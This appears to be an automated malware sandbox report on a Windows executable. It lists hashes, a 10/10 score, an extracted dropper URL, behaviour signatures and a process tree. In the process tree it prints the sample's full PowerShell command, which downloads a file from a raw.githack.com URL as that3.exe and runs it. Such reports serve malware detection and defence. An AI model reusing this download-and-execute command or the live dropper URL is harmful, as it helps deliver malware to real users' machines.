Analysis

  • max time kernel
    80s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 21:14

General

  • Target

    17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe

  • Size

    89KB

  • MD5

    8ab6d02d09997d5a1db2420aa60bb0e0

  • SHA1

    67d2e628591e369c658cc2a65aa88b1fb8eb5863

  • SHA256

    17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3

  • SHA512

    8ed4116295add2915c4957f4c5af54d6a7f02d3b961278e63dd7fe730d6f41686550b3b2156cdce2df2e848358b8ece38157ace9762162a071aed3a7670d7447

  • SSDEEP

    1536:zMFWeATa+8j6IuQ1crSgUZdnXAvU/XPNwsWh/5tDdWcFfjEQM3U0LRMaE:I7Z+LIB/n4U/fid9jpNfjEB37MaE

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe
    "C:\Users\Admin\AppData\Local\Temp\17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox', 'that3.exe')
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox', 'that3.exe')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c that3.exe
      2⤵
        PID:2720

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1636-5-0x000007FEF61FE000-0x000007FEF61FF000-memory.dmp

      Filesize

      4KB

    • memory/1636-6-0x000000001B270000-0x000000001B552000-memory.dmp

      Filesize

      2.9MB

    • memory/1636-7-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

      Filesize

      9.6MB

    • memory/1636-9-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

      Filesize

      9.6MB

    • memory/1636-8-0x0000000002310000-0x0000000002318000-memory.dmp

      Filesize

      32KB

    • memory/1636-10-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

      Filesize

      9.6MB

    • memory/1636-11-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

      Filesize

      9.6MB

    • memory/1636-12-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

      Filesize

      9.6MB

    • memory/1636-13-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

      Filesize

      9.6MB

    • memory/1976-0-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/1976-15-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB